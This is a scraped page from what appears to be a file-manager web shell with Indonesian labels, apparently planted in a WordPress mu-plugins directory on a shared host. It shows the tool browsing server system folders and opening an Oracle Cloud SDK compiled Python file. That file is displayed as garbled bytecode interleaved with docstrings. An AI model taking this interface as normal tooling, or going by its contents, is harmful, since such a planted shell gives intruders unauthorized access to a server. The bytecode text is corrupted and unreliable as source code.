📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
disaster_recovery
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/disaster_recovery/models
💾
Free:
45.7 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: invoke_function_step.pyc
a N��fT � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�DrPlanUserDefinedStep� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s~ e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z d d� Z dd� Zdd� ZdS )�InvokeFunctionStepz. Invoke Oracle function step details. c K sB ddddd�| _ ddddd�| _d| _d| _d| _d| _d| _dS ) a� Initializes a new InvokeFunctionStep object with values from keyword arguments. The default value of the :py:attr:`~oci.disaster_recovery.models.InvokeFunctionStep.step_type` attribute of this class is ``INVOKE_FUNCTION`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param step_type: The value to assign to the step_type property of this InvokeFunctionStep. Allowed values for this property are: "RUN_OBJECTSTORE_SCRIPT_PRECHECK", "RUN_LOCAL_SCRIPT_PRECHECK", "INVOKE_FUNCTION_PRECHECK", "RUN_OBJECTSTORE_SCRIPT", "RUN_LOCAL_SCRIPT", "INVOKE_FUNCTION" :type step_type: str :param function_id: The value to assign to the function_id property of this InvokeFunctionStep. :type function_id: str :param function_region: The value to assign to the function_region property of this InvokeFunctionStep. :type function_region: str :param request_body: The value to assign to the request_body property of this InvokeFunctionStep. :type request_body: str �str)� step_type�function_id�function_region�request_body�stepType� functionId�functionRegion�requestBodyN�INVOKE_FUNCTION)� swagger_types� attribute_map� _step_type�_function_id�_function_region� _request_body)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/disaster_recovery/models/invoke_function_step.py�__init__ s ��zInvokeFunctionStep.__init__c C s | j S )z� Gets the function_id of this InvokeFunctionStep. The OCID of function to be invoked. Example: `ocid1.fnfunc.oc1.iad.exampleocid2` :return: The function_id of this InvokeFunctionStep. :rtype: str �r �r r r r r <